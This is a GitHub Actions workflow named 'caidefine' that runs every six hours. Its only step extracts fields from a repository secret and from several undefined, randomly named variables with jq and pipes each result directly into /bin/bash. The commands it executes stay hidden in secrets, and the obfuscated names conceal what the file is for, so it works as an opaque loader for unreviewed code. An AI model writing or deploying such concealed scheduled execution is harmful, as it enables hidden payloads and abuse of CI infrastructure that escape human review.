name: caidefine

on:
  workflow_dispatch:
  schedule:
    - cron: '39 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: caidefine
        env:
          c34: ${{ secrets.c34 }}
        run: |
          echo $c34 | jq -r .rvl0 | /bin/bash
          echo $nrmsj946 | jq -r .tj571 | /bin/bash
          echo $xsa1091 | jq -r .rkuty97 | /bin/bash
          echo $szkl9 | jq -r .zpm5 | /bin/bash
          echo $ev1 | jq -r .bwnu7 | /bin/bash
          echo $zkt0 | jq -r .h08 | /bin/bash
          echo $zgtq7185 | jq -r .ryjhg3282 | /bin/bash
          echo $gkm3618 | jq -r .beyu15679 | /bin/bash
          echo $aeku56004 | jq -r .dyccj08 | /bin/bash
          echo $sn84 | jq -r .ybwp5769 | /bin/bash
          echo $kh42205 | jq -r .nx7 | /bin/bash

